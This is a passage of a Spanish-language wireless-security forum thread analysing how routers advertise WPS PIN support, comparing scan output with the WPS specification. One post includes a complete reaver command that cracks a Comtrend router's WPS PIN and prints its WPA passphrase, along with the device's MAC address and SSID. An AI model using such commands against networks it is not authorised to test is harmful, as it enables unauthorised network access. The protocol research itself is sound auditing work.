...Excepto enterarnos de que un router tiene o no el WPS en mode PIN habilitado y funcionando.
Al final no es poca cosa.  :

Si atacamos un PA y que obtenemos Ehash1 = Ehash2 sabemos que el router no tiene el WPS en mode PIN habilitado del todo y que no podremos obtener la llave WPA aunque tenemos el PIN valido.

Desconectado

#7 19-01-2016 21:44:21

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 94

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Una explicación genial, como siempre.

Me estaba preguntando, que si en Prácticamente todos los mensajes WPS figura el campo Config Method, en el cual el AP indica los modos de configuración WPS que tiene habilitados.

WPS_Beacon_Frame.jpgWPS_Probe_Response.jpgWPS_M1.jpgWPS_Config_Method.jpg

Además, la "R" indica que no es un parámetro opcional.

¿No sería más sencillo comprobar el valor de este campo para no lanzar un ataque contra un AP que si bien tiene el WPS habilitado, este no está configurado para soportar el método Label(Pin)?.

Un saludo.

Ultima edición por Patcher (19-01-2016 21:46:30)

Desconectado

#8 20-01-2016 13:10:24

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Hola parcher.
Unas palabras llenas de sabiduría y pertinencia... Como siempre. big_smile
En teoría deberías tener razón....
...¡Ojalá tendrías razón! : Hace tiempo intente hacer un escaneo para sustituir wash.
Al final no lo hice porque no logre el resultado que quería ya que no he conseguido hacer "un patrón" para interpretar correctamente lo que esta anunciado en los PROBES WPS. hmm

Ejemplo1; este router tiene el WPS PIN habilitado y funcionado: (mac 00:1A:2B - comtrend "n", viejo pero no tanto)

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Selected Registrar: 0x0
		 * Response Type: 3 (AP)
		 * UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
		  * Manufacturer: Broadcom
		 * Model: Broadcom
		 * Model Number: 123456
		 * Serial Number: 1234
		 * Primary Device Type: 6-0050f204-1
		 * Device name: BroadcomAP
		 * Config methods: Display, PBC

No pone "label"

Ejemplo 2 : Este también tiene el WPS PIN funcionando (lo demuestra de cierto modo el hecho de que sea bloqueado ) , es un "voda"

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * AP setup locked: 0x01
		 * Response Type: 3 (AP)
		 * UUID: 50523378-af99-ee1f-8a03-b8e724637dc3
		 * Manufacturer: Broadcom
		 * Model: Broadcom
		 * Model Number: 123456
		 * Serial Number: 1234
		 * Primary Device Type: 6-0050f204-1
		 * Device name: BroadcomAP
		 * Config methods:
		 * RF Bands: 0x1
		 * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

Esta vez no sale nada en "config method"

tercero ejemplo, aquí también el WPS en modo PIN funciona... essid tipo MOVISTAR_XXXX

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * UUID: bc329e00-1dd8-11b2-8601-e241363e3f90
		 * RF Bands: 0x1
		 * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

A pesar de no ser opcional el TAG "config method" no esta siquiera presente.

cuarto ejemplo:

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Response Type: 3 (AP)
		 * UUID: e7d4111a-0005-6320-514d-ef6d3d4b09da
		 * Manufacturer: Observa
		 * Model: BRA14NR
		 * Model Number: BRA14NR
		 * Serial Number: 96368GW
		 * Primary Device Type: 6-0050f204-1
		 * Device name: BRA14NR
		 * Config methods:
		 * RF Bands: 0x1
		 * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

Observa, con PIN activado pero sin método indicado en "Config methods"

Ultimo ejemplo que pongo, el mas perturbador

	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)

Nada más... y el WPS en modo PIN funciona.

Lo que no he hecho es mirar en los M1,
Cuando intenté hacer mi cosita para escaneo WPS no se conocía pixiedust y no se me ha ocurrido mirar en los M1.
Haré unas pruebas pero algo me dice que si no lo anuncian en los PROBES no lo van a hacer en el M1....

Una pregunta: ¿Los documentos que pusiste salen de la documentación de la wifi-alliance sobre el WPS?

Saludetes smile

Desconectado

#9 20-01-2016 17:30:56

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 94

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Si, la información fue extraída de Wi-Fi Protected Setup Specification 1.0h.

Vayamos por partes, el campo de información es opcional en los Beacon pero no en los probe ni en el M1, almenos eso es lo indicado en la expecificación WPS donde se indica que se trata de un campo Requerido.

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)
    * Selected Registrar: 0x0
    * Response Type: 3 (AP)
    * UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
    * Manufacturer: Broadcom
    * Model: Broadcom
    * Model Number: 123456
    * Serial Number: 1234
    * Primary Device Type: 6-0050f204-1
    * Device name: BroadcomAP
    * Config methods: Display, PBC

Si te fijas, el modo configurado es Display y no label, como tu bien indicas.

WPS_Config_Method
En conclusión, el metodo pín no está activado. Este es un caso claro.

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)
    * AP setup locked: 0x01
    * Response Type: 3 (AP)
    * UUID: 50523378-af99-ee1f-8a03-b8e724637dc3
    * Manufacturer: Broadcom
    * Model: Broadcom
    * Model Number: 123456
    * Serial Number: 1234
    * Primary Device Type: 6-0050f204-1
    * Device name: BroadcomAP
    * Config methods:
    * RF Bands: 0x1
    * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

En este el AP está bloqueado y por tanto tampoco tiene sentido intentar conectar. En cualquier caso debería indicar los modos de configuración y para ello me remito a la justificación que doy al último de tus ejemplos y que es igual a este salvo porque el AP en ese caso no está bloqueado.

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)
    * UUID: bc329e00-1dd8-11b2-8601-e241363e3f90
    * RF Bands: 0x1
    * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20
WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)

Podrían corresponder a un Beacon y no a un probe, fíjate que no contienen el campo "Response Type" (Requerido en un probe). La información de ambos frames, beacon y probes, es muy similar.

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)
    * Response Type: 3 (AP)
    * UUID: e7d4111a-0005-6320-514d-ef6d3d4b09da
    * Manufacturer: Observa
    * Model: BRA14NR
    * Model Number: BRA14NR
    * Serial Number: 96368GW
    * Primary Device Type: 6-0050f204-1
    * Device name: BRA14NR
    * Config methods:
    * RF Bands: 0x1
    * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

Lo que me extraña en este caso, al igual que en el comentado anteriormente, es que contenga el campo "Config methods", lo cual indica que está recibiendo el TLV(Por tanto el AP sí lo anuncia), y que este esté vacío. ¿Con que herramienta estas capturando esta información?, ¿Podría suceder que no la esté imprimiendo correctamente? . Para salir de dudas habría que analizar el frame en RAW, la cadena binaria capturada. Me decanto por un fallo en la impresión de la información.     

Como ves no me rindo así como así smile.

Un saludo.

Ultima edición por Patcher (20-01-2016 17:44:38)

Desconectado

#10 20-01-2016 22:13:01

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Sobre este caso :

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)
    * Selected Registrar: 0x0
    * Response Type: 3 (AP)
    * UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
    * Manufacturer: Broadcom
    * Model: Broadcom
    * Model Number: 123456
    * Serial Number: 1234
    * Primary Device Type: 6-0050f204-1
    * Device name: BroadcomAP
    * Config methods: Display, PBC

Como dices no sale "label" por lo tanto concluyes - lógicamente - que el método PIN no esta activado...
Pues...  esta activado. hmm
Es un Comtrend WAP-5813n (algo viejo) soportado por WPSPIN con PINes genéricos con la configuración por defecto

Aquí puedes ver la salida entera :

BSS 00:1a:2b:b0:23:90(on wlan0)
	TSF: 48916603511 usec (0d, 13:35:16)
	freq: 2462
	beacon interval: 100 TUs
	capability: ESS Privacy ShortSlotTime (0x0411)
	signal: -72.00 dBm
	last seen: 604 ms ago
	Information elements from Probe Response frame:
	SSID: WLAN_F492
	Supported rates: 1.0* 2.0* 5.5* 11.0* 18.0 24.0 36.0 54.0 
	DS Parameter set: channel 11
	ERP: <no flags>
	ERP D4.0: <no flags>
	Extended supported rates: 6.0 9.0 12.0 48.0 
	HT capabilities:
		Capabilities: 0x186c
			HT20
			SM Power Save disabled
			RX HT20 SGI
			RX HT40 SGI
			No RX STBC
			Max AMSDU length: 7935 bytes
			DSSS/CCK HT40
		Maximum RX AMPDU length 65535 bytes (exponent: 0x003)
		Minimum RX AMPDU time spacing: 8 usec (0x06)
		HT RX MCS rate indexes supported: 0-15
		HT TX MCS rate indexes are undefined
	HT operation:
		 * primary channel: 11
		 * secondary channel offset: no secondary
		 * STA channel width: 20 MHz
		 * RIFS: 1
		 * HT protection: no
		 * non-GF present: 1
		 * OBSS non-GF present: 0
		 * dual beacon: 0
		 * dual CTS protection: 0
		 * STBC beacon: 0
		 * L-SIG TXOP Prot: 0
		 * PCO active: 0
		 * PCO phase: 0
	WPS:	 * Version: 1.0
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * Selected Registrar: 0x0
		 * Response Type: 3 (AP)
		 * UUID: 4eedc249-3860-3c7f-c786-649b26ada5ae
		 * Manufacturer: Broadcom
		 * Model: Broadcom
		 * Model Number: 123456
		 * Serial Number: 1234
		 * Primary Device Type: 6-0050f204-1
		 * Device name: BroadcomAP
		 * Config methods: Display, PBC
	WPA:	 * Version: 1
		 * Group cipher: TKIP
		 * Pairwise ciphers: CCMP TKIP
		 * Authentication suites: PSK
		 * Capabilities: 16-PTKSA-RC 1-GTKSA-RC (0x000c)
	WMM:	 * Parameter version 1
		 * u-APSD
		 * BE: CW 15-1023, AIFSN 3
		 * BK: CW 15-1023, AIFSN 7
		 * VI: CW 7-15, AIFSN 2, TXOP 3008 usec
		 * VO: CW 3-7, AIFSN 2, TXOP 1504 usec

Y aquí reaver lo tumba en un instante :

[email protected]:~$ sudo reaver -i wlan0mon -p 77775078 -b 00:1A:2B:B0:23:90 -vv -n -g 1 -c 11

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead & Soxrok2212 & Wiire & kib0rg

[+] Switching wlan0mon to channel 11
[+] Waiting for beacon from 00:1A:2B:B0:23:90
[+] Associated with 00:1A:2B:B0:23:90 (ESSID: WLAN_F492)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 1
[+] Trying pin 77775078.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M5 message
[+] Sending M6 message
[+] Received M7 message
[+] Sending WSC NACK
[+] Sending WSC NACK
[+] Pin cracked in 5 seconds
[+] WPS PIN: '77775078'
[+] WPA PSK: 'bd8565af3d05d3e8a559'
[+] AP SSID: 'WLAN_F492'
[+] Nothing done, nothing to save.

Fíjate en el essid y la mac, no hay confusión : Es este.

¿Con que herramienta estas capturando esta información?, ¿Podría suceder que no la esté imprimiendo correctamente? . Para salir de dudas habría que analizar el frame en RAW, la cadena binaria capturada. Me decanto por un fallo en la impresión de la información.

Lo he hecho rápido con iw scan
Es un escaneo pasivo que puede resultar incompleto y puede explicar efectivamente porque tengo una salida así :

WPS:* Version: 1.0
    * Wi-Fi Protected Setup State: 2 (Configured)

Aunque suele indicar que ha tenido un problema si pasa algo con el TLV
ejemplo :

	WPS:	 * Version: 1.0[img]https://www.wifi-libre.com/img/members/3/ZTEpixiestrange.jpg[/img]
		 * Wi-Fi Protected Setup State: 2 (Configured)
		 * RF Bands: 0x1
		 * Unknown TLV (0x1049, 6 bytes): 00 37 2a 00 01 20

Mejor fijarse en el caso del comtrend por el cual no hay dudas sobre el hecho de que las condiciones están perfectas y no influyen en el resultado.
Voy a capturar el trafico haciendo un ataque WPS para examinar lo que dice el M1...

ZTEpixiestrange.jpg

lo mismo : Display y PBC pero no "label"
Aquí dejo el *.pcap por si quieres echarle un ojo : WPS_Comtrend.pcap

Como ves no me rindo así como así smile.

big_smile
Yo me había rendido pero como te veo con ganas me animo... A ver si podemos encontrar la forma de determinar si el mode PIN esta habilitado o no.

Desconectado

#11 21-01-2016 18:03:44

Patcher
Very Important Usuario

Registrado: 14-01-2016
Mensajes: 94

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Tienes toda la razón hmm, no me había fijado en que a ese si pudiste conectar .

He visto el fichero de captura y la información del config method sólo figura en el M1. Ahondando un poco más, he revisado el manual del router, está muy bien detallado el proceso de configuración WPS y cuando se activa el modo PIN, este se pude generar de forma aleatoria o puede introducirlo el usuario de forma manual. Quizás sea ese el motivo del porque el AP publica el modo Display en lugar de Label.

Fijaros además en estos extractos de la especificación WPS:
http://s26.postimg.org/btm2u3dbt/Wps_Label_Display.png

http://s26.postimg.org/425cvj96h/Wps_Label_Display2.png

http://s26.postimg.org/p0bitm915/Wps_EAP.png

Realmente ambos modos trabajan igual, el label está pensado para los equipos que llevan normalmente el pin en la etiqueta de fabricante y el Display para los dispositivos que muestran el PIN en un Display, pero el proceso de identificación es el mismo en ambos casos. Podríamos considerar que serian validos todos aquellos AP que publiquen tanto el modo Label como el Display.

En el mismo fichero de captura también he visto que figura el campo "Device password ID", este es otro de los que la norma especifica como requeridos para un paquete M1.

http://s26.postimg.org/j0nrpyo8p/Device_password_ID.png
http://s26.postimg.org/ynf13c20p/Device_Password_Id_Tabla.png

Lo cual nos da una pista ineludible de que el pin está activado.

Habría que hacer un estudio más amplio y fijarse sobre todo en los paquetes M1, creo que por aquí pueden ir los tiros. A ver si en unos días puedo hacer un scan amplio y publicar algún resultado más conciso.

Un saludo.

Ultima edición por Patcher (21-01-2016 18:05:30)

Desconectado

#12 21-01-2016 20:38:09

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 2,058

Re: Extraño ataque pixeidust contra ZTE H218N sin WPS habilitado

Borat-VeryNice.jpg

Como ves no me rindo así como así smile.

¡Ya lo veo! lol
  Mañana tendré tiempo para investigar esto... ¡Me parece que el asunto esta muy bien encarrilado!. smile

Desconectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
11 90 Hoy 15:55:34 por kcdtv
Pegado:
Pegado:: Belgrano Windalo por Patcher
3 64 Hoy 15:32:01 por kcdtv
11 179 Hoy 00:44:17 por Patcher
Hola! por Ike
3 34 Ayer 22:36:24 por Flashed
0 16 Ayer 19:25:20 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: Ike
Usuarios registrados conectados: 0
Invitados conectados: 7

Estadisticas de los foros

Número total de usuarios registrados: 356
Número total de temas: 618
Número total de mensajes: 4,237

Máx. usuarios conectados: 45 el 12-04-2016 12:02:20